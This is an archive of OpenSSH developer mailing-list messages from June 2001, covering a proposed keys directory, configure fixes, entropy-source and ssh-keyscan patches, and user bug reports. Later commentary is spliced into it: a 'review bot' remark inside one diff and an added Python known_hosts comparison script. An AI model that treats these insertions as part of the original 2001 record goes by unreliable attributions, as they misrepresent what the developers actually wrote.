And in terms of this feature, the complexity added is minimal. Processing the subdirectory shouldn't require special pains, because it exists in the user's ~/.ssh directory. If an attacker can create files or directories in the user's ~/.ssh directory, it's already Game Over.

The effort required by the OpenSSH developers is also negligible, because Pekka offered to write the patch. (Or at least that was my interpretation; Pekka, please correct me if I'm placing words in your mouth.)

I realize opinions may have been somewhat polarized by the resulting almost-flamefest, but I think Pekka's original suggestion had merit. Markus et al., please [re]consider it.

--
James Ralston, Information Technology
Software Engineering Institute
Carnegie Mellon University, Pittsburgh, PA, USA

From deraadt at cvs.openbsd.org Sat Jun 9 07:51:25 2001
From: deraadt at cvs.openbsd.org (Theo de Raadt)
Date: Fri, 08 Jun 2001 15:51:25 -0600
Subject: authorized_keys2 directory idea
In-Reply-To: Your message of "Fri, 08 Jun 2001 17:36:12 EDT."
Message-ID: <200106082151.f58LpQv20587@cvs.openbsd.org>

We have already discussed this at length. Sorry.

> My $0.02: I'd like to see this feature.
>
> I'm not really concerned with the authorized_keys{,2} entries. Where
> I think the feature would be a win is with known_hosts{,2}. My
> known_hosts file currently has 50+ entries, and it's a royal PITA to
> maintain them.
>
> The easiest way I've found to reliably keep files in sync across
> different machines is rsync-over-ssh. That works great if the
> granularity of change you're dealing with is a file, because rsync is
> flexible enough to express conditions like:
>
> 1. Only add files that do not exist on the target.
> 2. Don't overwrite newer files on the target.
> 3. Delete files that exist on the target but not on the source.
>
> But when the granularity of change is the *content* of an individual
> file, this won't work. All I can tell using rsync is that the files
> differ. To tell what those differences are, I have to scp the remote
> file to the local system, diff it, figure out how to reconcile the
> differences, modify the local version of the remote file, and then scp
> it back to the remote system.
>
> Now repeat this about a dozen times or so. It's a big waste of time,
> and it's not fun.
>
> And yes, this task would be simpler if I could always push my changes
> out immediately after I make them. But that's not always possible
> (due to firewalls and depending on whether I'm at work, home, or on
> the road). And it's not always desirable either: my known_hosts files
> are not strictly identical across all of the machines I access. (I
> could, however, express "push-only-if-older-version-exists-on-target"
> using rsync.)
>
> On Sun, 3 Jun 2001, Markus Friedl wrote:
> > i don't understand why editing a file is hard. i think keeping a
> > file in sync is simpler than syncing directories, especially
> > deleting files.
>
> It might be simpler for you, but that doesn't mean it's simpler for
> everyone.
>
> On Sun, 3 Jun 2001, Theo de Raadt wrote:
> > OpenSSH is security software. A lot of you keep asking for more and
> > more features, and the code keeps growing and growing and growing.
> > Assuming that the number of lines per bug is a constant, how long
> > before one of these features which no one uses becomes a hole?
>
> You have a good point: it would be unwise to carelessly add additional
> features to OpenSSH.
>
> However, good software grows or dies, and OpenSSH is no exception.
> Carelessly *refusing* to add additional features to OpenSSH will
> damage the project every bit as much as (if not more than) carelessly
> adding additional features, because the former will antagonize more
> people (including supporters and contributors, both current and
> potential) than the latter.
>
> And in terms of this feature, the complexity added is minimal.
> Processing the subdirectory shouldn't require special pains, because
> it exists in the user's ~/.ssh directory. If an attacker can create
> files or directories in the user's ~/.ssh directory, it's already Game
> Over.
>
> The effort required by the OpenSSH developers is also negligible,
> because Pekka offered to write the patch. (Or at least that was my
> interpretation; Pekka, please correct me if I'm placing words in your
> mouth.)
>
> I realize opinions may have been somewhat polarized by the resulting
> almost-flamefest, but I think Pekka's original suggestion had merit.
> Markus et al., please [re]consider it.
>
> --
> James Ralston, Information Technology
> Software Engineering Institute
> Carnegie Mellon University, Pittsburgh, PA, USA

From gert at greenie.muc.de Sat Jun 9 08:48:53 2001
From: gert at greenie.muc.de (Gert Doering) Date: Sat, 9 Jun 2001 00:48:53 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from James Ralston on Fri, Jun 08, 2001 at 05:36:12PM -0400 References: Message-ID: <20010609004853.L22709@greenie.muc.de> Hi, On Fri, Jun 08, 2001 at 05:36:12PM -0400, James Ralston wrote: > My $0.02: I'd like to see this feature. > > I'm not really concerned with the authorized_keys{,2} entries. Where > I think the feature would be a win is with known_hosts{,2}. My > known_hosts file currently has 50+ entries, and it's a royal PITA to > maintain them. Now for known_hosts, I tend to disagree - I don't see any compelling reason to exclude hosts from that list. So what we do is just "collect all host keys on one central machine, and distribute the complete file from there". With the keys, it's not that easy, as not everybody has access everywhere. gert -- USENET is *not* the non-clickable part of WWW! //www.muc.de/~gert/ Gert Doering - Munich, Germany gert at greenie.muc.de fax: +49-89-35655025 gert.doering at physik.tu-muenchen.de From mouring at etoh.eviladmin.org Sat Jun 9 12:02:03 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Fri, 8 Jun 2001 21:02:03 -0500 (CDT) Subject: configure patch for Alpha/Tru64 Unix 5.1 In-Reply-To: Message-ID: Thanks, applied. On Wed, 6 Jun 2001, Petter Reinholdtsen wrote: > > I had to apply this patch to configure.in to get configure to run on > Tru64 Unix on Alpha. The RSA test forgot to reset $LIBS. > > (The compile stopped with missing "zlib.h". I'll send more patches if > required. :-) > > diff -ur src-2.9p1/configure.in src-2.9p1-local/configure.in > --- src-2.9p1/configure.in Wed Jun 6 17:15:09 2001 > +++ src-2.9p1-local/configure.in Wed Jun 6 19:06:07 2001 > @@ -683,6 +683,7 @@ > break; > ], []) > done > +LIBS="$saved_LIBS" > > if test ! -z "$no_rsa" ; then > AC_MSG_RESULT(disabled) 
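Review bot: the `+LIBS="$saved_LIBS"` added right after the `done` loop and the second hunk's switch from `LIBS="$saved_LIBS -lcrypto -lRSAglue -lrsaref"` to `LIBS="$LIBS -lcrypto -lRSAglue -lrsaref"` depend on each other: once LIBS is restored immediately after the loop, the RSAref branch can safely build on $LIBS, but applying either hunk without the other leaves that branch linking against whatever the last probe iteration left in LIBS. Apply both together (as was done), and consider a one-line comment at the new reset saying that the loop above overwrites LIBS on every iteration, so nobody removes it as redundant later.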
> @@ -698,7 +699,7 @@ > else > RSA_MSG="yes (using RSAref)" > AC_MSG_RESULT(using RSAref) > - LIBS="$saved_LIBS -lcrypto -lRSAglue -lrsaref" > + LIBS="$LIBS -lcrypto -lRSAglue -lrsaref" > fi > fi > fi > -- > ##> Petter Reinholdtsen <## | pere at td.org.uit.no > O- > http://www.hungry.com/~pere/ | Go Mozilla, go! Go! > From mouring at etoh.eviladmin.org Sat Jun 9 12:12:26 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Fri, 8 Jun 2001 21:12:26 -0500 (CDT) Subject: configure --with-catman is supposed to be --with-mantype In-Reply-To: <20010608122930.A8082@lucent.com> Message-ID: Thanks, applied. On Fri, 8 Jun 2001, Dave Dykstra wrote: > There's a typo in configure.in that's specifying --with-catman as an > option but the help message says --with-mantype. Here's a patch. > > - Dave Dykstra > > > *** configure.in.old Fri Jun 8 13:23:13 2001 > --- configure.in Fri Jun 8 13:17:47 2001 > *************** > *** 1422,1428 **** > AC_SUBST(INSTALL_SSH_PRNG_CMDS) > > > ! AC_ARG_WITH(catman, > [ --with-mantype=man|cat|doc Set man page type], > [ > case "$withval" in > --- 1422,1428 ---- > AC_SUBST(INSTALL_SSH_PRNG_CMDS) > > > ! AC_ARG_WITH(mantype, > [ --with-mantype=man|cat|doc Set man page type], > [ > case "$withval" in > From carl at bl.echidna.id.au Sat Jun 9 15:17:46 2001 
From: carl at bl.echidna.id.au (carl at bl.echidna.id.au)
Date: Sat, 9 Jun 2001 15:17:46 +1000 (EST)
Subject: quicky about return code of scp?
Message-ID: <200106090517.f595HkTi005407@rollcage.bl.echidna.id.au>

A quick grovel through scp.c shows me that main() ends with this:

        }
        exit(errs != 0);
    }

Am I correct in assuming that this means that if there are no problems (i.e. the scp executes completely, with no errors) scp's return code is 0? I need to know if a copy has been successful in a perl script, and the easiest way to check is to look at the code. The return code isn't documented in the man page for scp.1.

thanks
Carl

From openssh-unix-dev at thewrittenword.com Sat Jun 9 16:39:44 2001
From: openssh-unix-dev at thewrittenword.com (openssh-unix-dev at thewrittenword.com)
Date: Sat, 9 Jun 2001 01:39:44 -0500
Subject: Unreviewed 2.9p1 patches?
In-Reply-To: ; from tim@multitalents.net on Thu, Jun 07, 2001 at 09:57:18PM -0700
References: <20010607061453.J14017@postal.il.thewrittenword.com>
Message-ID: <20010609013943.A13869@postal.il.thewrittenword.com>

On Thu, Jun 07, 2001 at 09:57:18PM -0700, Tim Rice wrote:
> On Thu, 7 Jun 2001 openssh-unix-dev at thewrittenword.com wrote:
>
> > Anyone get a chance to review the patches we submitted?
> > http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=99041860215437&w=2
>
> Not yet.
> There are a bunch of build related patches that I have
> on my personal TODO list to look at.

Ok, great. I just wanted to make sure it wasn't seen by someone.

--
albert chin (china at thewrittenword.com)

From bowman at math.ualberta.ca Sun Jun 10 02:15:20 2001
From: bowman at math.ualberta.ca (John Bowman)
Date: 9 Jun 2001 16:15:20 -0000
Subject: Defect: OpenSSH hangs on logout
Message-ID: <20010609161520.11322.qmail@wizard.math.ualberta.ca>

> I'm using Linux on two machines and I get this problem
> fairly often (when I'm logged on for more than 6
> hours continuously).

Under Linux, a patch already exists for the hang-on-exit bug (without data loss side effects). See

http://www.math.ualberta.ca/imaging/snfs/

-- John Bowman
University of Alberta
http://www.math.ualberta.ca/~bowman

From markus.friedl at informatik.uni-erlangen.de Sat Jun 9 22:27:39 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Sat, 9 Jun 2001 14:27:39 +0200
Subject: authorized_keys2 directory idea
In-Reply-To: ; from qralston+ml.openssh-unix-dev@andrew.cmu.edu on Fri, Jun 08, 2001 at 05:36:12PM -0400
References:
Message-ID: <20010609142739.A29124@folly>

On Fri, Jun 08, 2001 at 05:36:12PM -0400, James Ralston wrote:
> My $0.02: I'd like to see this feature.
>
> I'm not really concerned with the authorized_keys{,2} entries. Where
> I think the feature would be a win is with known_hosts{,2}. My
> known_hosts file currently has 50+ entries, and it's a royal PITA to
> maintain them.

no. i don't think so.

for known_hosts you have to scan your net and build a single file of trusted hosts that can be distributed to all client machines. you have to check this file for key changes. checking for new files is much harder than

$ diff a b

From openssh-unix-dev at mindrot.org Sat Jun 9 22:49:11 2001
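Gert's and Markus's messages above describe the same procedure: scan the hosts, build one trusted known_hosts file on a central machine, distribute it, and check it for key changes. The last step is the security-relevant one, since a host whose key changed has either been re-keyed on purpose or is being impersonated, and a line-wise `diff a b` cannot tell a changed key apart from a reordered line or a new alias. The following is an added example written for this page, not OpenSSH code and not something from the thread: it parses the two line formats that ssh-keyscan emits (protocol-1 `host bits exponent modulus` and protocol-2 `host keytype base64-key`), indexes entries by host name and key type, and reports added, removed and changed keys separately. The two sample files and their key strings are constructed placeholders, not real keys.

```python
"""Report host-key changes between two known_hosts files.

Added example for this thread (not part of OpenSSH).  Understands the
two line formats ssh-keyscan produces: protocol-1 RSA entries
("host bits exponent modulus") and protocol-2 entries
("host keytype base64-key [comment]").  The first field may list
several aliases separated by commas.
"""
import sys
from typing import Dict, List, Tuple

KeyId = Tuple[str, str]          # (hostname or address, key type)


def parse_known_hosts(text: str) -> Dict[KeyId, str]:
    """Map (host, keytype) -> key material for every entry in text."""
    keys: Dict[KeyId, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) >= 4 and fields[1].isdigit():
            # protocol 1: "host bits exponent modulus"; the key type is
            # implied, so label it rsa1 the way ssh-keyscan -t names it
            keytype, material = "rsa1", " ".join(fields[1:4])
        elif len(fields) >= 3:
            # protocol 2: "host ssh-rsa|ssh-dss base64-key"
            keytype, material = fields[1], fields[2]
        else:
            continue                 # malformed line; skip it
        for host in fields[0].split(","):
            keys[(host, keytype)] = material
    return keys


def diff_known_hosts(old_text: str, new_text: str) -> Dict[str, List[KeyId]]:
    """Classify every (host, keytype) as added, removed or changed.

    'changed' is the finding that matters: the host still answers, but
    with a different key, so it was either re-keyed on purpose or
    something is impersonating it.
    """
    old = parse_known_hosts(old_text)
    new = parse_known_hosts(new_text)
    return {
        "added": sorted(k for k in new if k not in old),
        "removed": sorted(k for k in old if k not in new),
        "changed": sorted(k for k in new if k in old and old[k] != new[k]),
    }


def format_report(result: Dict[str, List[KeyId]]) -> List[str]:
    """One line per finding, changed keys first so they are not missed."""
    lines = []
    for kind in ("changed", "added", "removed"):
        for host, keytype in result[kind]:
            lines.append(f"{kind.upper():8s} {host} ({keytype})")
    return lines


def read_file(path: str) -> str:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()


# Constructed sample files; the key strings are placeholders, not real keys.
OLD_KNOWN_HOSTS = """\
# distributed from the central machine last week
alpha.example.net,alpha,10.0.0.1 ssh-rsa AAAAB3alphaKEY
beta.example.net ssh-dss AAAAB3betaKEY
gamma.example.net 1024 35 1234567890123456789
"""

NEW_SCAN = """\
alpha.example.net,alpha,10.0.0.1 ssh-rsa AAAAB3alphaKEY
beta.example.net ssh-dss AAAAB3betaREKEYED
delta.example.net ssh-rsa AAAAB3deltaKEY
"""

if __name__ == "__main__":
    if len(sys.argv) == 3:       # real use: distributed file and a fresh scan
        old_text, new_text = read_file(sys.argv[1]), read_file(sys.argv[2])
    else:                        # no arguments: run on the constructed sample
        old_text, new_text = OLD_KNOWN_HOSTS, NEW_SCAN
    for line in format_report(diff_known_hosts(old_text, new_text)):
        print(line)
```

Assuming the script is saved as knownhosts_diff.py (a name chosen here), `python3 knownhosts_diff.py ssh_known_hosts <(ssh-keyscan -f ssh_hosts)` compares the distributed file against a fresh scan; with no arguments it runs on the constructed sample and reports beta as CHANGED, delta as ADDED and gamma as REMOVED. The comparison key includes the key type on purpose, so a host that gained a protocol-2 key next to its existing rsa1 key shows up as added, not changed.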
From: openssh-unix-dev at mindrot.org (Markus Friedl)
Date: Sat, 9 Jun 2001 14:49:11 +0200
Subject: how to specify cipher for ssh client ?
In-Reply-To: ; from sunil@redback.com on Fri, Jun 08, 2001 at 11:19:13AM -0700
References:
Message-ID: <20010609144911.A6430@folly>

On Fri, Jun 08, 2001 at 11:19:13AM -0700, Sunil K. Vallamkonda wrote:
> I have:
> SSH-1.5-OpenSSH_2.3.1p1

upgrade your software.

From webinfo at sententia.nl Sun Jun 10 19:14:32 2001
From: webinfo at sententia.nl (webinfo)
Date: Sun, 10 Jun 2001 11:14:32 +0200
Subject: Strange login problem
Message-ID: <5.1.0.14.2.20010610111248.00a63aa0@sentlinux>

I'm using Redhat 7.1 on several boxes, no problems so far. Except for one box, where I get kicked out immediately, the moment I log in. When I look at the log file it says:

Jun 6 22:18:55 myhost sshd[7782]: Accepted password for ROOT from x.x.x.x port 62004 ssh2
Jun 6 22:18:56 myhost sshd[7782]: fatal: session_input_channel_req: channel 0: no session

Normally, after like three log in attempts, I am able to log in. Can anyone give me some ideas what's going on here? The client I'm using is ssh from security group.

Regards,
Frans.

From urban at UNIX-Beratung.de Sun Jun 10 01:30:22 2001
From: urban at UNIX-Beratung.de (Robert Urban)
Date: Sat, 09 Jun 2001 17:30:22 +0200
Subject: fix for getaddrinfo problem on Compaq Tru64 UNIX
Message-ID: <200106091530.RAA0000063254@hell.spielwiese.de>

Hello OpenSSH Developers,

Tru64 V5.1, and probably previous versions, assumes you want 4.3BSD socket behaviour unless 4.4BSD sockets are explicitly requested, which can be done by #defining one of "_SOCKADDR_LEN" or "_XOPEN_SOURCE_EXTENDED". Probably #defining "_SOCKADDR_LEN" has fewer consequences.

4.3BSD socket behaviour means that getaddrinfo returns sockaddr structs where sa_family is set to zero, which causes subsequent calls to getnameinfo to barf.

Any chance you can take this into consideration in "configure"?

thanks,
Rob Urban

From markus.friedl at informatik.uni-erlangen.de Sun Jun 10 21:04:37 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Sun, 10 Jun 2001 13:04:37 +0200
Subject: Defect: OpenSSH hangs on logout
In-Reply-To: <20010609161520.11322.qmail@wizard.math.ualberta.ca>; from bowman@math.ualberta.ca on Sat, Jun 09, 2001 at 04:15:20PM -0000
References: <20010609161520.11322.qmail@wizard.math.ualberta.ca>
Message-ID: <20010610130437.A7660@folly>

however, i'd like to point out that this patch is not recommended. it's very likely that it leads to data loss.

On Sat, Jun 09, 2001 at 04:15:20PM -0000, John Bowman wrote:
> > I'm using Linux on two machines and I get this problem
> > fairly often (when I'm logged on for more than 6
> > hours continuously).
>
> Under Linux, a patch already exists for the hang-on-exit bug
> (without data loss side effects). See
>
> http://www.math.ualberta.ca/imaging/snfs/
>
> -- John Bowman
> University of Alberta
> http://www.math.ualberta.ca/~bowman

From mouring at etoh.eviladmin.org Mon Jun 11 03:27:37 2001
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org)
Date: Sun, 10 Jun 2001 12:27:37 -0500 (CDT)
Subject: ssh-keyscan for ssh2
In-Reply-To:
Message-ID:

Wayne, where is the current status of the patch? I know Markus made a few comments on fatal().

Thanks
- Ben

On Sat, 19 May 2001, Wayne Davison wrote:
> On Sat, 19 May 2001, Markus Friedl wrote:
> > i think you can overload fatal() with longjmp().
>
> Yeah, I was thinking of doing the same thing. I didn't do it earlier
> because it means moving fatal() into its own file so that we don't end
> up with a duplicate symbol.
>
> The appended patch changes this, and it also implements: the change in
> option parsing to support -T timeout and -t rsa1,dsa,rsa; the new -v
> option (for verbose logging); the other changes suggested on the list (I
> think I got them all).
>
> Since the patches were getting heavily nested, this is back to being
> based on the CVS version.
>
> ** I left off the change to Makefile.in. Just add logfatal.o to the
> line right after log.o. **
>
> ..wayne..

From mouring at etoh.eviladmin.org Mon Jun 11 03:49:18 2001
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org)
Date: Sun, 10 Jun 2001 12:49:18 -0500 (CDT)
Subject: Patch to enable multiple possible sources of entropy
In-Reply-To: <20010607125014.A15157@lucent.com>
Message-ID:

Hmm.. my only complaints about the patch are that seed_rng and init_rng are pretty unreadable due to #ifdef/#end, and that I don't know if I like the idea of ssh/sshd stepping down in entropy quality on a whim. Which is what this patch would do if for some odd reason prngd is offline at startup of sshd/ssh.

- Ben

On Thu, 7 Jun 2001, Dave Dykstra wrote:
> I have a need to have the same OpenSSH binaries run on multiple machines
> which are administered by different people. That means on Solaris, for
> example, there will be some with /dev/random, some on which I can run prngd
> because they'll be installing my binaries as root, and some which will have
> neither because they will be only installed as non-root. Below is a patch
> to enable choosing all 3 possible sources at compile time, with the
> available source selected at run time. If no configure parameters are
> given, it will still determine the entropy source at compile time and only
> the code for the one type, exactly as it does today. The patch adds a
> configure option called --with-builtin-entropy.
>
> I have tested this in all possible combinations of entropy sources, and on
> 6 different flavors of Unix (linux, solaris, sunos4, hpux, irix, and
> unixware1). The patch is against 2.9p1 but applies cleanly to the current
> CVS. Please accept this patch into the openssh code base. Don't forget to
> run autoheader and autoconf.
>
> - Dave Dykstra
>
> *** entropy.c.O Fri Jun 1 15:52:20 2001 > --- entropy.c Tue Jun 5 17:41:47 2001 > *************** > *** 80,91 **** > # define USE_PRNGD > #endif > > - #if defined(USE_PRNGD) || defined(RANDOM_POOL) > - > #ifdef USE_PRNGD > /* Collect entropy from PRNGD/EGD */ > int > !
get_random_bytes(unsigned char *buf, int len) > { > int fd; > char msg[2]; > --- 80,89 ---- > # define USE_PRNGD > #endif > > #ifdef USE_PRNGD > /* Collect entropy from PRNGD/EGD */ > int > ! prngd_get_random_bytes(unsigned char *buf, int len) > { > int fd; > char msg[2]; > *************** > *** 100,110 **** > --- 98,110 ---- > memset(&addr, '\0', sizeof(addr)); > > #ifdef PRNGD_PORT > + debug2("Opening entropy socket on localhost port %d", PRNGD_PORT); > addr.sin_family = AF_INET; > addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); > addr.sin_port = htons(PRNGD_PORT); > addr_len = sizeof(struct sockaddr_in); > #else /* use IP socket PRNGD_SOCKET instead */ > + debug2("Opening entropy socket at %s", PRNGD_SOCKET); > /* Sanity checks */ > if (sizeof(PRNGD_SOCKET) > sizeof(addr.sun_path)) > fatal("Random pool path is too long"); > *************** > *** 179,192 **** > close(fd); > return(rval); > } > ! #else /* !USE_PRNGD */ > #ifdef RANDOM_POOL > /* Collect entropy from /dev/urandom or pipe */ > int > ! get_random_bytes(unsigned char *buf, int len) > { > int random_pool; > > random_pool = open(RANDOM_POOL, O_RDONLY); > if (random_pool == -1) { > error("Couldn't open random pool \"%s\": %s", > --- 179,194 ---- > close(fd); > return(rval); > } > ! #endif /* !USE_PRNGD */ > ! > #ifdef RANDOM_POOL > /* Collect entropy from /dev/urandom or pipe */ > int > ! 
pool_get_random_bytes(unsigned char *buf, int len) > { > int random_pool; > > + debug2("Opening random pool at %s", RANDOM_POOL); > random_pool = open(RANDOM_POOL, O_RDONLY); > if (random_pool == -1) { > error("Couldn't open random pool \"%s\": %s", > *************** > *** 206,242 **** > return(1); > } > #endif /* RANDOM_POOL */ > - #endif /* USE_PRNGD */ > - > - /* > - * Seed OpenSSL's random number pool from Kernel random number generator > - * or PRNGD/EGD > - */ > - void > - seed_rng(void) > - { > - unsigned char buf[32]; > - > - debug("Seeding random number generator"); > - > - if (!get_random_bytes(buf, sizeof(buf))) { > - if (!RAND_status()) > - fatal("Entropy collection failed and entropy exhausted"); > - } else { > - RAND_add(buf, sizeof(buf), sizeof(buf)); > - } > - > - memset(buf, '\0', sizeof(buf)); > - } > - > - void > - init_rng(void) > - { > - check_openssl_version(); > - } > - > - #else /* defined(USE_PRNGD) || defined(RANDOM_POOL) */ > > /* > * FIXME: proper entropy estimations. All current values are guesses > * FIXME: (ATL) do estimates at compile time? > --- 208,215 ---- > return(1); > } > #endif /* RANDOM_POOL */ > > + #ifdef USE_BUILTIN_ENTROPY > /* > * FIXME: proper entropy estimations. All current values are guesses > * FIXME: (ATL) do estimates at compile time? > *************** > *** 834,840 **** > * syscalls and program output > */ > void > ! seed_rng(void) > { > mysig_t old_sigchld_handler; > > --- 807,813 ---- > * syscalls and program output > */ > void > ! prng_seed_rng(void) > { > mysig_t old_sigchld_handler; > > *************** > *** 860,871 **** > } > > void > ! init_rng(void) > { > int original_euid; > > - check_openssl_version(); > - > original_uid = getuid(); > original_euid = geteuid(); > > --- 833,842 ---- > } > > void > ! prng_init_rng(void) > { > int original_euid; > > original_uid = getuid(); > original_euid = geteuid(); > > *************** > *** 912,915 **** > prng_initialised = 1; > } > > ! 
#endif /* defined(USE_PRNGD) || defined(RANDOM_POOL) */ > --- 883,979 ---- > prng_initialised = 1; > } > > ! #endif /* USE_BUILTIN_ENTROPY */ > ! > ! #define BUILTIN_SOURCE 1 > ! #define PRNGD_SOURCE 2 > ! #define POOL_SOURCE 3 > ! > ! static int seed_source = 0; > ! > ! void > ! init_rng(void) > ! { > ! check_openssl_version(); > ! > ! #ifdef RANDOM_POOL > ! #if !defined(USE_PRNGD) && !defined(USE_BUILTIN_ENTROPY) > ! seed_source = POOL_SOURCE; > ! #else > ! if (access(RANDOM_POOL, R_OK) == 0) { > ! seed_source = POOL_SOURCE; > ! return; > ! } > ! #endif > ! #endif /* RANDOM_POOL */ > ! > ! /* it's not trivial to probe for an open port so just make it > ! * take priority over the other sources if it is defined > ! */ > ! #ifdef PRNGD_PORT > ! seed_source = PRNGD_SOURCE; > ! #else > ! > ! #ifdef PRNGD_SOCKET > ! #ifndef USE_BUILTIN_ENTROPY > ! seed_source = PRNGD_SOURCE; > ! #else > ! if (access(PRNGD_SOCKET, R_OK) == 0) { > ! seed_source = PRNGD_SOURCE; > ! return; > ! } > ! #endif /* USE_BUILTIN_ENTROPY */ > ! #endif /* PRNGD_SOCKET */ > ! > ! #ifdef USE_BUILTIN_ENTROPY > ! seed_source = BUILTIN_SOURCE; > ! prng_init_rng(); > ! #endif > ! > ! #endif /* PRNGD_PORT */ > ! > ! if (seed_source == 0) > ! fatal("Couldn't find source for random number generator seed"); > ! } > ! > ! /* > ! * Seed OpenSSL's random number pool > ! */ > ! void > ! seed_rng(void) > ! { > ! unsigned char buf[32]; > ! int ret; > ! > ! debug("Seeding random number generator"); > ! > ! switch (seed_source) { > ! #ifdef USE_BUILTIN_ENTROPY > ! case BUILTIN_SOURCE: > ! prng_seed_rng(); > ! return; > ! #endif > ! #ifdef USE_PRNGD > ! case PRNGD_SOURCE: > ! ret = prngd_get_random_bytes(buf, sizeof(buf)); > ! break; > ! #endif > ! #ifdef RANDOM_POOL > ! case POOL_SOURCE: > ! ret = pool_get_random_bytes(buf, sizeof(buf)); > ! break; > ! #endif > ! } > ! > ! #if defined(USE_PRNGD) || defined(RANDOM_POOL) > ! if (!ret) { > ! if (!RAND_status()) > ! 
fatal("Entropy collection failed and entropy exhausted"); > ! } else { > ! RAND_add(buf, sizeof(buf), sizeof(buf)); > ! } > ! > ! memset(buf, '\0', sizeof(buf)); > ! #endif > ! } > ! > *** configure.in.O Mon Jun 4 12:25:12 2001 > --- configure.in Thu Jun 7 13:37:09 2001 > *************** > *** 1334,1340 **** > ] > ) > > ! # Check for PRNGD/EGD pool file > AC_ARG_WITH(prngd-port, > [ --with-prngd-port=PORT read entropy from PRNGD/EGD localhost:PORT], > [ > --- 1334,1340 ---- > ] > ) > > ! # Check for PRNGD/EGD pool port request > AC_ARG_WITH(prngd-port, > [ --with-prngd-port=PORT read entropy from PRNGD/EGD localhost:PORT], > [ > *************** > *** 1349,1354 **** > --- 1349,1357 ---- > AC_ARG_WITH(prngd-socket, > [ --with-prngd-socket=FILE read entropy from PRNGD/EGD socket FILE (default=/var/run/egd-pool)], > [ > + if test ! -z "$PRNGD_PORT" ; then > + AC_MSG_ERROR([*** cannot use both --with-prngd-port and --with-prngd-socket]) > + fi > if test "x$withval" != "xno" ; then > PRNGD_SOCKET="$withval" > AC_DEFINE_UNQUOTED(PRNGD_SOCKET, "$PRNGD_SOCKET") > *************** > *** 1375,1385 **** > ] > ) > > > # detect pathnames for entropy gathering commands, if we need them > INSTALL_SSH_PRNG_CMDS="" > rm -f prng_commands > ! if (test -z "$RANDOM_POOL" && test -z "$PRNGD") ; then > # Use these commands to collect entropy > OSSH_PATH_ENTROPY_PROG(PROG_LS, ls) > OSSH_PATH_ENTROPY_PROG(PROG_NETSTAT, netstat) > --- 1378,1406 ---- > ] > ) > > + # Check for use of builtin entropy collector > + AC_ARG_WITH(builtin-entropy, > + [ --with-builtin-entropy use builtin entropy collector if nothing else available], > + [ > + if test ! 
-z "$PRNGD_PORT" ; then > + AC_MSG_ERROR([*** cannot use both --with-prngd-port and --with-builtin-entropy]) > + fi > + BUILTIN_RNG=1 > + ], > + [ > + # Only select by default if don't have another method > + if test -z "$RANDOM_POOL" && test -z "$PRNGD" ; then > + BUILTIN_RNG=1 > + fi > + ] > + ) > > # detect pathnames for entropy gathering commands, if we need them > INSTALL_SSH_PRNG_CMDS="" > rm -f prng_commands > ! if test ! -z "$BUILTIN_RNG" ; then > ! AC_DEFINE(USE_BUILTIN_ENTROPY) > ! > # Use these commands to collect entropy > OSSH_PATH_ENTROPY_PROG(PROG_LS, ls) > OSSH_PATH_ENTROPY_PROG(PROG_NETSTAT, netstat) > *************** > *** 1885,1901 **** > > # Print summary of options > > ! if test ! -z "$RANDOM_POOL" ; then > ! RAND_MSG="Device ($RANDOM_POOL)" > ! else > ! if test ! -z "$PRNGD_PORT" ; then > ! RAND_MSG="PRNGD/EGD (port localhost:$PRNGD_PORT)" > ! elif test ! -z "$PRNGD_SOCKET" ; then > ! RAND_MSG="PRNGD/EGD (socket $PRNGD_SOCKET)" > else > ! RAND_MSG="Builtin (timeout $entropy_timeout)" > ! BUILTIN_RNG=1 > fi > fi > > # Someone please show me a better way :) > --- 1906,1930 ---- > > # Print summary of options > > ! RAND_MSG="" > ! randmsg() > ! { > ! if test -z "$RAND_MSG" ; then > ! RAND_MSG="$1" > else > ! RAND_MSG="$RAND_MSG or $1" > fi > + } > + if test ! -z "$RANDOM_POOL" ; then > + randmsg "Device ($RANDOM_POOL)" > + fi > + if test ! -z "$PRNGD_PORT" ; then > + randmsg "PRNGD/EGD (port localhost:$PRNGD_PORT)" > + elif test ! -z "$PRNGD_SOCKET" ; then > + randmsg "PRNGD/EGD (socket $PRNGD_SOCKET)" > + fi > + if test ! 
-z "$BUILTIN_RNG" ; then > + randmsg "Builtin (timeout $entropy_timeout)" > fi > > # Someone please show me a better way :) > *** acconfig.h.O Mon Jun 4 12:42:09 2001 > --- acconfig.h Mon Jun 4 13:53:36 2001 > *************** > *** 95,100 **** > --- 95,103 ---- > /* Port number of PRNGD/EGD random number socket */ > #undef PRNGD_PORT > > + /* Use builtin entropy collector if nothing else available */ > + #undef USE_BUILTIN_ENTROPY > + > /* Builtin PRNG command timeout */ > #undef ENTROPY_TIMEOUT_MSEC > > From wayne at blorf.net Mon Jun 11 07:03:50 2001 From: wayne at blorf.net (Wayne Davison) Date: Sun, 10 Jun 2001 14:03:50 -0700 (PDT) Subject: ssh-keyscan for ssh2 In-Reply-To: <20010607003630.A3268@folly> Message-ID: On Thu, 7 Jun 2001, Markus Friedl wrote: > fatal_add_cleanup(fatal_callback, NULL); I had wanted to also suppress the error, but I suppose that's not strictly necessary. Here's a version of my patch that uses your suggestion for changing the handling of fatal errors, works with the latest changes to the ssh2 connect code, and also updates the ssh-keyscan man page. ..wayne.. -------------- next part -------------- Index: ssh-keyscan.1 --- ssh-keyscan.1 2001/04/19 20:31:02 1.5 +++ ssh-keyscan.1 2001/06/10 20:58:41 @@ -15,14 +15,20 @@ .Nd gather ssh public keys .Sh SYNOPSIS .Nm ssh-keyscan -.Op Fl t Ar timeout -.Op Ar -- | host | addrlist namelist -.Op Fl f Ar files ... +.Op Fl v46 +.Op Fl T Ar timeout +.Op Fl t Ar type +.Op Fl - +.Op Ar host | addrlist namelist +.Op Fl f Ar files +.Ar ... .Sh DESCRIPTION .Nm is a utility for gathering the public ssh host keys of a number of hosts. It was designed to aid in building and verifying .Pa ssh_known_hosts +and +.Pa ssh_known_hosts2 